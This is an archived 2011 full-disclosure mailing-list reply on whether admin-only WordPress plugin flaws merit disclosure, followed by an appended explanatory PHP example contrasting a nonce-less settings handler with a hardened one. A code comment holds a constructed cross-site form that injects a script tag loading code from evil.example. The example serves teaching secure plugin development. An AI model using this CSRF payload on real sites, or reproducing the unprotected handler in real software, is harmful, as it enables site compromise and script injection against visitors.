
List:       full-disclosure
Subject:    Re: [Full-disclosure] Question about disclosure of WordPress plugin
From:       Andrew Farmer <andfarm () gmail ! com>
Date:       2011-08-29 20:07:55
Message-ID: 8EC6C8F4-AD35-420F-982E-54C9401B8E6B () gmail ! com

On 2011-08-26, at 05:08, Miroslav Stampar wrote:
> Does anybody know what's the general opinion on disclosure of
> WordPress plugin vulnerabilities in these two sections:
<...>
> 2) admin ones (requires access to the restricted admin area)

If you need full admin access to run the exploit, you probably have enough access that you could get arbitrary code execution by installing a plugin, like:

http://wordpress.org/extend/plugins/wordpress-console/

So the "exploit" isn't really doing much at that point, unless it can be triggered remotely (e.g., CSRF).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
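The CSRF case Andrew raises is the one that turns an "admin-only" bug into something an outsider can trigger. As an added example that is not part of this thread and not the code of any real plugin: a constructed WordPress settings handler, first written the way many plugins do it (capability check only, so any page the logged-in admin visits can submit the form on their behalf), then with the nonce check WordPress provides. The plugin name `myplugin`, the option name and the form field are assumptions made for the example.

```php
<?php
/*
Plugin Name: Myplugin CSRF example (constructed for illustration, not a real plugin)
*/

// --- Vulnerable handler: admin-only, but remotely triggerable via CSRF ---
// current_user_can() proves the browser holds an admin session; it does NOT
// prove the admin meant to send this request. An attacker-controlled page
// such as the following (constructed) auto-submitting form will succeed
// whenever an admin who is logged in visits it:
//
//   <form method="post" action="https://victim.example/wp-admin/admin-post.php">
//     <input type="hidden" name="action" value="myplugin_save_vuln">
//     <input type="hidden" name="footer_html" value="<script src=//evil.example/x.js></script>">
//   </form><script>document.forms[0].submit()</script>
add_action( 'admin_post_myplugin_save_vuln', function () {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    // No request-origin check and no sanitization: stored as-is.
    update_option( 'myplugin_footer_html', $_POST['footer_html'] );
    wp_safe_redirect( admin_url( 'options-general.php?page=myplugin' ) );
    exit;
} );

// --- Hardened handler ---
add_action( 'admin_post_myplugin_save', function () {
    // The nonce is tied to the logged-in user, this action name and a time
    // window, and is only emitted into pages this site renders, so a
    // cross-site form cannot supply it. check_admin_referer() calls wp_die()
    // when the nonce is missing or invalid.
    check_admin_referer( 'myplugin_save' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    // Limit the stored value to the HTML WordPress allows in post content.
    $value = isset( $_POST['footer_html'] )
        ? wp_kses_post( wp_unslash( $_POST['footer_html'] ) )
        : '';
    update_option( 'myplugin_footer_html', $value );
    wp_safe_redirect( admin_url( 'options-general.php?page=myplugin' ) );
    exit;
} );

// Settings page whose form carries the nonce the hardened handler expects.
add_action( 'admin_menu', function () {
    add_options_page( 'Myplugin', 'Myplugin', 'manage_options', 'myplugin', function () {
        ?>
        <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
            <input type="hidden" name="action" value="myplugin_save">
            <?php wp_nonce_field( 'myplugin_save' ); ?>
            <textarea name="footer_html"><?php
                echo esc_textarea( get_option( 'myplugin_footer_html', '' ) );
            ?></textarea>
            <?php submit_button( 'Save' ); ?>
        </form>
        <?php
    } );
} );
```

The practical check when triaging an "admin-only" report is therefore whether the vulnerable action runs through `check_admin_referer()` / `wp_verify_nonce()` (or an equivalent origin check) before it does anything. If it does not, the attacker needs no credentials at all, only an admin who visits a page they control, and the report is worth disclosing; if it does, the attacker already needs an admin session, which is the situation Andrew describes.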


